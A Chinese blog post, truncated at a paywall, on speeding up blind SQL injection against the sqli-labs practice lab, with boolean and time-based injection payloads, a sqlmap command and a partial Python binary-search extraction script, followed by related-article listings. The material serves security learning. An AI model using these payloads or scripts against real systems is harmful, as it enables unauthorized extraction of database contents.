SQL盲注加速方法总结

于 2023-02-09 13:58:32 发布
阅读量3.3k 收藏 8
点赞数
分类专栏: 从入门到入狱 文章标签: sql 数据库 后端 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18980147/article/details/128951620
版权

sql盲注加速方法总结

盲注分为布尔盲注和时间盲注,一般为加快测试速度都用工具或者脚本跑。但有时还是很慢,这时就需要采取另外办法。在参考了一些资料后经过实验总结可行方案如下。1.二分法加速、2.与运算加速、3.二进制延时注入加速、4.dnslog OOB外带通信

常规的布尔盲注

猜解数据库名字的长度
?id=-1' or length(database())=8--+

逐一猜解数据库
?id=-1' or ascii(substr(database(),1,1))=115--+
或者
?id=-1' or ascii(mid(database(),1,1))=115--+
或者
?id=-1' or mid(database(),1,1)='s'--+

按照相同的方法猜解数据表的名字和字段内容
?id=-1' or ascii(mid(select (table_name) from information_schema.tables where
table_schema=database() limit 1,1))=?--+

常规的时间盲注

猜解数据库名字的长度
?id=-1' or if(length(database())=8,sleep(5),0)--+

猜解数据库名称
?id=-1' or if(ascii(mid(database(),1,1))<=135,sleep(5),0)--+
相同的方式猜解数据表数据字段

以sqli-lab靶场Less9为例进行测试

常规的sqlmap跑一下

sqlmap -u "http://192.168.3.17/sqli-labs/Less-9/?id=1" --tech=T --dbms=mysql --current-db --batch

在这里插入图片描述

总共耗时约67s,在爆表时花费11s

1.二分法加速

二分法也是一个常规的算法,数据量太大太小都不适合该算法。而我们盲注加速匹配字符的条件正好合适。

主要原理就是从中间截断,不断缩小检索范围。

在sqli-labs Less8中有判断依据You are in …,因此可以使用布尔盲注。以下是copy别人的二分法脚本

import requests
import time
import math

def binarySearch(url,payload,start,end):
    left=start
    right=end
    while left<right:
        mid=math.floor((left+right)/2)
        xkey1=payload.format(str(mid))
        target = url + xkey1
        #print(target)
        response = requests.post(target)
        if "You" in response.text:
            left=mid+1
        else:
            right=mid
    return int(left)

def database_len(url):
    for i in range(20):
        payload = "?id=1%27and%20length(database())>{}%23"
        return binarySearch(url,payload,0,100)

def database_name(url): #二分法
    databasename = ''
    aa =
最低0.47元/天 解锁文章
tpaer
关注
  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql盲注 解决_SQL注入之基于布尔的盲注详解
weixin_39638086的博客
12-19 551
基于布尔的盲注Web的页面的仅仅会返回True和False。那么布尔盲注就是进行SQL注入之后然后根据页面返回的True或者是False来得到数据库中的相关信息。由于本次是布尔注入,手注无法完整地进行脱裤。所以在本节需要编写大量的代码来帮助我们进行SQL注入,得到数据。所以在这章里面会有很多的Python代码。本次的示例就是Less-8。通过进行下面的语句的注入测试http://localhost...
SQL注入:时间盲注
最新发布
Jc0803kevin的专栏
07-12 293
SQL 时间盲注是一种利用数据库的延迟来判断查询结果的技术。主要用到sleep()函数前面讲到,对应的接口没有返回值不能继续下去,但是如果接口有返回值呢?
sqlmap 盲注速度提升技巧
火柴人的博客
06-07 2326
sqlmap 盲注速度提升技巧
SQL盲注的解决方案
Donald_Draper的专栏
10-27 3910
] 上面这篇文章用的是Mybaits的防注入策略,下面我们看一下,如何在进入mybatis之前,就提前处理, 如何处理呢? HttpServletRequest在获取参数时会调用两个方法,getParameter(String name) 和 getParameterValues(String name),我是不是可以继承HttpServletRequest,重写这两个方法,来解决SQL盲注呢?答案是可以的。具体请看下文: HttpServletRequest包装类: [code=&quot
sql盲注 解决_sql盲注学习笔记
weixin_30141859的博客
01-15 726
sql盲注在刚接触sql注入的时候还不太清楚sql盲注是什么,很多东西都要自己去体会才能知道到底是什么样子的。sql注入之盲注盲注其实是sql注入的一种,之所以称为盲注是因为他不会根据你sql注入的攻击语句返回你想要知道的错误信息。盲注分为两类:1.布尔盲注 布尔很明显Ture跟Fales,也就是说它只会根据    你的注入信息返回Ture跟Fales,也就没有了之前的报错信息。2.时间盲注 界面...
sql盲注 解决_sql盲注解决方案.docx
weixin_39692245的博客
12-19 733
sql盲注解决方案sql盲注解决方案篇一:景安安全培训-SQL注入漏洞-盲注   SQL注入漏洞   一.漏洞说明   1. SQL注入定义   SQL注入攻击(SQL Injection),简称注入攻击,SQL注入是web开发中最常见的一种安全漏洞。 SQL注入漏洞可以用来从数据库获取敏感信息,或者利用数据库的特性执行添加用户,导出文件等一系列恶意操作,甚至有可能获取数据库乃至系统最高权限...
让你的SQL盲注快起来
neal1991的专栏
04-19 771
本文首发于 Freebuf 平台,https://www.freebuf.com/articles/web/231741.htmlSQL 注入是当前 Web 安全中最常见的安全问题之一,...
(一)Xray-的安装,入门的使用方法
热门推荐
m0_52027565的博客
06-06 1万+
Xray的新手教程 作为一个新接触信息安全专业的菜鸟,最近突然对Xray扫描器产生了兴趣。下面来看看我的学习路程吧! 1. 什么是Xray? 2. 关于Xray的安装及运用。 3. 关于Xray的建议 1.Xray 是什么? 首先,它是一款非常功能强大的国产被动扫描工具,是长亭科技开发的社区版漏洞扫描神器。它的应用范围非常广eg:Web 通用漏洞检测,社区 POC 集成,被动代理扫描,浏览器爬虫扫描,报告输出,子域名扫描功能,主机漏洞检测,合规/基线扫描日志扫描模式,流量扫描模式… 所以,xray是白帽子
JavaWeb代码审计实战之迷你天猫商城系统详细分析版,实战应用级系统的Log4j2shell代码审计
Power7089的博客
08-22 2083
JavaWeb代码审计实战之迷你天猫商城系统详细分析版,实战应用级系统的Log4j2shell代码审计
防止sql注入解决方案
12-07
防止sql注入引起的网络安全的解决措施采用预编译语句集,它内置了处理SQL注入的能力,只要使用它的setString方法传值即可:
SQL注入技巧-盲注暴库详细技巧及实例
10-11
个人通过拜读各位前辈们的博文以及大量的ctf题目训练,结合挖洞经验整理的几点sql常用的盲注技巧,结合具体的sql指令加深理解,针对常用的防护技术,总结了几种通用的绕过技巧
测试工具的使用
u013291468的博客
09-01 491
测试工具utf,loadrunner原理 loadrunner工具:是一种适用于许多软件体系构架的自动负载测试工具,从用户关注的响应时间、吞吐量,并发用户和性能计数器等方面来衡量系统的性能表现,辅助用户进行系统性能的优化。 原理:通过以模拟上千万用户实施并发负载及实时性能监测的方式来确认和查找问题,优化性能和加速应用系统的发布周期。 组成:LoadRunner主要包括三个前台功能组件,分别为VuG...
04 渗透测试基础
weixin_43234021的博客
01-04 9823
渗透测试基础一 代码审计1 基础环境搭建(1) Web服务:WAMP+phpstudy(2) phpstudy2 HTML 表单 一 代码审计 1 基础环境搭建 (1) Web服务:WAMP+phpstudy (2) phpstudy 启动问题 端口正常开放 80 http 3306 mysql web根目录[C:\Users\dq\Documents\phpStudy-1-24\phpStudy\WWW] php 探针 phpinfo.php phpmyadmin Apache配置文件:[
sql盲注
m0_61398945的博客
08-07 1525
sql盲注,updatexml报错注入,布尔盲注,基于时间盲注
mysql dnslog_渗透技巧:使用dnslog加快盲注速度 · C1imber’s Blog
weixin_34624426的博客
02-07 622
sql盲注分为基于bool的盲注和基于时间盲注,大家都知道,盲注是在页面没有显示位并且没有报错信息的时候,通过构造payload使页面返回的内容不同或者是页面响应的时间不同从而去判断出数据库中的数据,不管是bool盲注还是时间盲注,在进行判断的时候都需要一个字符一个字符的去判断,虽然二分法可以加快盲注的速度,但是还有一种更好的办法,那就是使用dnslog,具体过程如下图由上图可以看出要进行dns...
sql盲注 解决_SQL 盲注漏洞
weixin_39943992的博客
12-19 1191
原文来自:PORTSWIGGER WEB SECURITY >> Web Security Academy>>SQL injection >>Blind SQL injection翻译完毕...本部分,我们将描述什么是 SQL 盲注漏洞,并解释发现和利用 SQL 盲注漏洞的多种技术。什么是 SQL 盲注?当应用程序容易收到 SQL 注入,但其 HTTP 响应不包...
SQL盲注详解
永远是少年
07-17 926
今天继续给大家介绍Linux运维相关知识,本文主要内容是SQL盲注详解。 一、SQL盲注详解 二、非查询SQL语句介绍 三、SQL盲注类型
SQL报错盲注详解
永远是少年
07-21 994
今天继续给大家介绍Linux运维相关知识,本文主要内容是SQL报错盲注详解。 一、SQL报错函数详解 二、SQL报错盲注payload构造
pikachu sql 盲注
09-22
pikachu sql 盲注是指在使用sqlmap工具对pikachu数据库进行盲注攻击的过程。盲注是一种利用应用程序没有正确过滤或转义用户输入的漏洞,通过向数据库发送特定的查询语句来获取敏感信息的攻击方法。 在进行pikachu sql 盲注时,可以使用sqlmap工具中的一些命令来执行相关操作。例如,引用所示的命令可以用来列出pikachu数据库中的所有表格,引用所示的命令可以用来从pikachu数据库的users表格中获取用户名和密码,引用所示的命令可以用来列出pikachu数据库中users表格的所有列。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值